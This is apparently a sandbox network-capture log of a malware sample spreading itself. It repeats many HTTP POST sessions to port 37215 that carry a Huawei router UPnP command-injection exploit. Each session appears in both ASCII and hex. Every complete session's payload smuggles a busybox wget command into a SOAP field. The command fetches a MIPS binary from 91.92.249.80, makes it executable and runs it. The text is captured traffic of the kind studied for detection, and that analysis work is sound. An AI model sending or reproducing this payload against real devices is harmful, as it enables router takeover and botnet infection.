                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1738192.168.2.2352614193.147.131.18337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537698984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1739192.168.2.235528299.216.57.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537698984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1740192.168.2.233789441.9.244.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537722111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1741192.168.2.2335930203.84.166.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537722111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1742192.168.2.235237641.236.172.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537736893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1743192.168.2.2337988197.207.48.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537902117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1744192.168.2.2356502157.232.210.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537981987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1745192.168.2.235236488.160.19.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537981987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1746192.168.2.23553344.74.104.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542052031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1747192.168.2.2337632209.18.140.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542064905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1748192.168.2.2354652157.81.182.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542083979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
